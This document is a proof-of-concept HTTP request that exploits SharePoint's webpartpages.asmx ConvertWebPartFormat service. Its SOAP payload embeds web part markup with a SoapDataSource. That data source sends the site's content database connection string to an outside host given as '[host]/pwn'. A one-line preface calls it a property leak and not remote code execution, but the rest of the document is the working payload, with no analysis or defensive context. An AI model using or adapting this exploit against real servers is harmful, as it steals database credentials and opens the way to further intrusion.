Attention: It's only a PoC to leak the attribute/property, not RCE EXP.
POST /_vti_bin/webpartpages.asmx HTTP/1.1
Host: splab13
SOAPAction: http://microsoft.com/sharepoint/webpartpages/ConvertWebPartFormat
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Connection: keep-alive
Content-Type: text/xml; charset=utf-8
Content-Length: 1733
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ConvertWebPartFormat xmlns="http://microsoft.com/sharepoint/webpartpages"><inputFormat><![CDATA[
<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPages" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register TagPrefix="att" Namespace="Microsoft.SharePoint.WebControls" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<WebPartPages:WebPartZone id="id00" runat="server">
<ZoneTemplate>
<WebPartPages:XsltListFormWebPart id="id01" runat="server">
<XmlDefinitionLink>http://webdb.com/aaaa</XmlDefinitionLink>
<DataSources>
<att:SoapDataSource runat="server" SelectUrl="http://[host]/pwn">
<SelectCommand>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<leakeddata>{leak}</leakeddata>
</soap:Body>
</soap:Envelope>
</SelectCommand>
<SelectParameters>
<WebPartPages:DataFormParameter Name="leak" PropertyName="Parent.Controls[1].Controls[0].Web.Site.ContentDatabase.DatabaseConnectionString" DefaultValue="NULL"/>
</SelectParameters>
</att:SoapDataSource>
</DataSources>
</WebPartPages:XsltListFormWebPart>
<att:TemplateContainer runat="server" id="f01" />
</ZoneTemplate>
</WebPartPages:WebPartZone>
]]></inputFormat></ConvertWebPartFormat></soap:Body></soap:Envelope>